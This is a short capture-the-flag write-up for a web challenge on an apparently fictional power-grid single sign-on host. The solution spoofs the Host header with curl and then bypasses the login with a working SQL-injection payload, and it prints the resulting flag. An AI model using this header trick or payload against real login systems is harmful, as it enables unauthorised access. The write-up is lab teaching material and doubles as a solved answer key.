Skip to content

Single Sign-On

Category: SSO    |    Points: 3    |    Difficulty: Medium

🧠 Challenge Text

Hi, emergency troubleshooter,

we are preparing a new interface for the single sign-on system, which, on the recommendation of external pentesters, is now also protected by a WAF. Test the system to ensure it is secure.

Stay grounded!

http://login.powergrid.tcc:8080

🔍 Hints Text

1. Hint A WAF was probably just added in front of the old system.

🎨 Solution

Going directly to url redirect us to non-existent host intranet.powergrid.tcc.

$ curl -L 'http://login.powergrid.tcc:8080/index.php'
curl: (6) Could not resolve host: intranet.powergrid.tcc

Let's try to pretend we came from intranet

curl -L 'http://login.powergrid.tcc:8080/index.php' -H 'Host: intranet.powergrid.tcc:8080'

After trying different injections commands, sql injections command login=' or 1=1;-- did the job (always true expr) where password does not matter

curl -L 'http://login.powergrid.tcc:8080/index.php' -X POST -H 'Host: intranet.powergrid.tcc:8080' --data-raw 'login=%27+or+1%3D1%3B-+-&password=x&padding='
...
FLAG{rxRk-Dj3A-bGc0-cyHc}
...